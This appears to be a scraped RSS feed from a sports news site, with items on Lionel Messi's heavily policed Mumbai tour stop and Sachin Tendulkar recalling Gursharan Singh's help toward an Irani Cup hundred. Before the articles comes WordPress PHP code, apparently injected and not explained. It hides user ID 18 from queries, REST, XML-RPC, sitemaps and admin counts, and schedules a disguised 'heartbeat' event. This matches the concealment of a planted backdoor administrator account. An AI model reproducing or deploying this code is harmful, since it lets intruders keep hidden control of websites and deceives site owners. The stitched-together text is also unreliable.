add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Lionel Messi Reaches Mumbai Under Tight Security for GOAT India Tour 2025 appeared first on The Edge Media.
]]>Following his arrival, Messi headed to the Taj Hotel in Colaba for a short rest before proceeding to the Cricket Club of India’s Brabourne Stadium.
There, he is scheduled to attend a Padel GOAT Club event, which will be followed by a celebrity football match later in the afternoon.
Messi, who is accompanied by Inter Miami teammates Luis Suarez and Rodrigo de Paul, is expected to reach the iconic Wankhede Stadium around 5 pm for the main highlight of the Mumbai leg of the tour.
Fans have been gathering in large numbers, hoping to catch a glimpse of the football icon.
In view of the anticipated crowd, Mumbai Police have enforced stringent security measures at both venues. Restrictions have been imposed on carrying water bottles, metal items and coins inside the stadiums, while watchtowers have been installed to closely monitor crowd movement.
More than 2,000 police personnel have been deployed in and around Brabourne and Wankhede stadiums to ensure smooth conduct of the events.
A senior police official said,
“The arrangements were strengthened after the disruption witnessed during the Kolkata leg of the tour.”
The official said,
“Considering the chaos that prevailed in Kolkata and the security breach reported there, we have put in place World Cup-level security arrangements in Mumbai.”
Messi had arrived in India in the early hours of Saturday, but his Kolkata appearance later that day was marred by overcrowding and poor crowd management. In contrast, the Hyderabad leg of the tour went off smoothly, offering a reassuring experience for fans and organisers alike.
The post Lionel Messi Reaches Mumbai Under Tight Security for GOAT India Tour 2025 appeared first on The Edge Media.
]]>The post Sachin Tendulkar Recalls Gursharan Singh’s Selfless Act That Helped Him Score a Crucial Hundred appeared first on The Edge Media.
]]>Speaking at an Ageas Federal Life Insurance event in Mumbai, Tendulkar recalled the 1989–90 Irani Cup match between Rest of India and Delhi, played at the Wankhede Stadium. Despite Delhi dominating the contest and eventually winning by 309 runs, Tendulkar stood out with a determined 103, the only significant contribution apart from WV Raman’s 41.

Rest of India were struggling at 209 for 9 while chasing a massive 554. It was then that Gursharan Singh, representing Indi, Delhi, and Punjab, stepped in at No. 10 despite nursing a broken hand.
His goal was simple: support the young Tendulkar long enough for him to complete his hundred. Together, they added 36 runs before the innings ended at 245.

Tendulkar said the moment stayed with him forever.
He described the act as an example of commitment and integrity.
“As they say, promises must be kept — but they must also be fulfilled. That is our DNA”, he said, explaining how this match served as a trial before national selection.
He remembered batting in the 90’s, when chairman of selectors Raj Singh Dungarpur urged Gursharan to come out and support his teammate despite the injury. “Gursharan helped me get to my hundred, and after that, I got selected to play for India. Later, he too made it to the national side”, Tendulkar noted.
The legendary batter said, he thanked Gursharan extensively both on the ground and in the dressing room.
“Walking out with a broken hand was extraordinary. Whether I scored a hundred was secondary — what mattered was his spirit and willingness to help. That sincerity truly touched my heart”, he added.
The post Sachin Tendulkar Recalls Gursharan Singh’s Selfless Act That Helped Him Score a Crucial Hundred appeared first on The Edge Media.
]]>